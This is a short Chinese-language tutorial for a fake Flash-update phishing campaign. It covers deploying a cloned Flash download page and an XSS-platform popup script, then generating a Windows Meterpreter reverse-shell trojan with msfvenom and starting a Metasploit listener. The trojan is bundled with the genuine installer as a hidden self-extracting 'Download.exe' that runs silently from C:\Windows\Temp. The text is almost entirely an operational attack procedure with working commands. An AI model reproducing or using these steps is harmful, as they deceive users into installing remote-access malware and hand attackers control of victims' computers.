钓鱼前先了解一下什么叫Flash攻击钓鱼
一、在本机phpstudy中开启服务
二、在https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash中下载其源码文件并部署在网站根目录下。
二、来到xss平台 点击公共模块---flash弹窗钓⻥-查看, 将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。
三、修改我们创建的1.js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址
四、进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe ⽣成⼀个shell.exe⽊马拖到本机上
开启监听
msfconsole use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7set lport 4444run
六、将两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填
写解压路径为 C:\Windows\Temp,点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!
七、在kali模拟受害者的流程 最终获取到受害者⽹站控制权